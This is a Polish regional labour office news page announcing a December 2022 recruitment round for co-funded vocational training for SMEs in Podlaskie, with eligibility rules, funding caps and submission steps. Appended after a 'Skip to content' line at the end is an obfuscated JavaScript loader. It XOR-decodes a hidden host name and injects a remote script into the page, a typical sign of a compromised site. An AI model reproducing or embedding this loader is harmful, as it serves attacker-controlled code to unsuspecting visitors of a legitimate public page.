Aktualności

Wspieranie rozwoju zawodowego przedsiębiorców i pracowników MŚP

gru 1, 2022 | Aktualności

Zarząd Województwa Podlaskiego Uchwałą Nr 303/5631/2022 z dnia 17 listopada 2022 roku, zwiększył wartość projektu pn. „Podmiotowy System Finansowania usług rozwojowych w województwie podlaskim”. W związku z powyższym Wojewódzki Urząd Pracy w Białymstoku pełniący rolę Operatora PSF ogłasza nabór Nr PSFWP 2/2022 na dofinansowanie usług rozwojowych.

Przedsiębiorcy mogą uzyskać dofinansowanie do usług rozwojowych – szkoleniowych, tj. szkolenie, egzamin, usługa o charakterze zawodowym realizowanych w formie stacjonarnej, zdalnej w czasie rzeczywistym oraz mieszanej (usługa stacjonarna połączona z usługą zdalną w czasie rzeczywistym).

Powyższe usługi (z możliwością dofinansowania) muszą być wpisane do Bazy Usług Rozwojowych https://uslugirozwojowe.parp.gov.pl/

Dofinansowanie w ramach naboru nr PSFWP 2/2022 nie może zostać przyznane:

 1. przedsiębiorcom, którzy mają zawarte Umowy wsparcia z WUP w Białymstoku i okres ich realizacji trwa w momencie złożenia kompletu dokumentów aplikacyjnych, chyba że Przedsiębiorca złożył Wniosek o refundację kosztów usługi rozwojowej dla końcowego rozliczenia, przed terminem wskazanym w Umowie wsparcia,
 2. przedsiębiorcom, którzy podlegają wykluczeniu na podstawie art.7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835 z późn.zm.)
 3. przedsiębiorcom, którzy podlegają wykluczeniu na podstawie art. 5k rozporządzenia (UE) Nr 833/2014 w brzmieniu nadanym rozporządzeniem Rady (UE) 2022/576 z dnia 8 kwietnia 2022 r. w sprawie zmiany rozporządzenia (UE) Nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE z 08.04.2022r. nr L 111, str.1),
 4. na osoby świadczące usługi na rzecz przedsiębiorcy na podstawie umowy zlecenia zgodnie z ustawą z dnia 23 kwietnia 1964 r. – Kodeks cywilny (Dz.U. z 2022 r. poz. 1360), 
 5. na usługi doradcze,
 6. na usługi szkoleniowe – studia podyplomowe,
 7. na usługi realizowane w formie zdalnej,
 8. na usługi realizowane w formie mieszanej (usługa stacjonarna połączona z usługą zdalną),
 9. na usługi realizowane w formie mieszanej (usługa zdalna połączona z usługą zdalną w czasie rzeczywistym).

Nabór dotyczy:

Mikro-, małych oraz średnich przedsiębiorców, posiadających siedzibę, filię, delegaturę, oddział czy inną prawnie dozwoloną formę organizacyjną działalności podmiotu na terenie województwa podlaskiego oraz ich pracowników.

Możliwe poziomy dofinansowania:

 1. dla pojedynczej usługi rozwojowej dla jednego uczestnika projektu (pracownika, zgodnie
  z definicją zawartą w Regulaminie naboru) do 5 000 PLN oraz do 80% kosztów usługi rozwojowej
 2. na osobę do 10 000 PLN
 3. na przedsiębiorstwo do 50 000 PLN

Termin przyjmowania Formularzy zgłoszeniowych Przedsiębiorcy w wersji elektronicznej:

5.12.2022 r. od godz. 7.30 do 6.12.2022 r. do godz. 15.30. Zastrzega się możliwość zmiany terminu przyjmowania Formularzy zgłoszeniowych wraz z załącznikami.

Pula środków przeznaczona na dofinansowanie w naborze wynosi nie mniej niż: 5 287 400,00 PLN.

W uzasadnionych przypadkach Operator PSF – Wojewódzki Urząd Pracy w Białymstoku zastrzega sobie prawo do przesunięć środków przeznaczonych na dofinansowanie usług rozwojowych przed rozstrzygnięciem lub po rozstrzygnięciu naboru.

Zgłoszenie do udziału w Projekcie odbywa się poprzez złożenie do WUP w Białymstoku wyłącznie:

 1. Formularza zgłoszeniowego Przedsiębiorcy stanowiącego Załącznik nr 1 do niniejszego Regulaminu zgodnie z poniższą instrukcją:
  1. Formularz zgłoszeniowy Przedsiębiorcy należy wypełnić w edytorze tekstu (elektronicznie) w języku polskim. Następnie należy zapisać go w formacie PDF.
  1. Formularz zgłoszeniowy Przedsiębiorcy w formacie PDF należy podpisać elektronicznie z zastosowaniem jednego z możliwych do zastosowania podpisów elektronicznych:
   1. ważnego profilu zaufanego ePUAP,
   1. ważnego bezpiecznego podpisu elektronicznego weryfikowanego przy pomocy kwalifikowanego certyfikatu
   1. Osoby posiadające e-dowód mogą się zalogować przy użyciu bezpiecznego środka identyfikacji elektronicznej (profil osobisty) i dokonać elektronicznego podpisu dokumentów (dzięki podpisowi osobistemu).

Formularz zgłoszeniowy Przedsiębiorcy w formacie PDF musi zostać podpisany elektronicznie przez osoby reprezentujące przedsiębiorstwo zgodnie z zasadą reprezentacji wynikającą z wpisu w Krajowym Rejestrze Sądowym (KRS) – Rejestrze Przedsiębiorców lub zgodnie z wpisem do Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG). W przypadku spółek cywilnych formularz zgłoszeniowy powinien zostać podpisany przez wszystkich wspólników spółki cywilnej.

 • Podpisany zgodnie z ppkt b) Formularz zgłoszeniowy Przedsiębiorcy w formacie PDF należy złożyć z zastosowaniem profilu ePUAP osoby reprezentującej przedsiębiorstwo zgodnie z dokumentem rejestrowym tj. Krajowym Rejestrze Sądowym (KRS) – Rejestrze Przedsiębiorców, zgodnie z wpisem do Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG) lub w przypadku spółek cywilnych – jednego ze wspólników na Elektroniczną Skrzynkę Podawczą WUP w Białymstoku.

    2)  Przedsiębiorca ma obowiązek złożyć do Punktu Przyjęć Korespondencji (Wojewódzki Urząd Pracy w Białymstoku, ul. Pogodna 22, 15-354 Białystok) jeden komplet wymaganych załączników wskazanych w Formularzu zgłoszeniowym Przedsiębiorcy w ciągu 3 dni roboczych (decyduje data wpływu do WUP w Białymstoku), licząc od pierwszego dnia roboczego następującego po dniu wysłania elektronicznej wersji Formularza zgłoszeniowego Przedsiębiorcy zgodnie z pkt 1).

Dokumentację aplikacyjną, o której mowa powyżej, w formie papierowej można dostarczyć:

osobiście lub przez inną osobę wyznaczoną przez Przedsiębiorcę,

poprzez nadanie w polskiej placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe (Dz.U. z 2022r. poz. 896 z późn.zm.).

Regulamin naboru PSFWP 2/2022 wraz z załącznikami (komplet dokumentów rekrutacyjnych) są dostępne na stronie internetowej Wojewódzkiego Urzędu Pracy
w Białymstoku http://wupbialystok.praca.gov.pl/ , w zakładce PSF.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);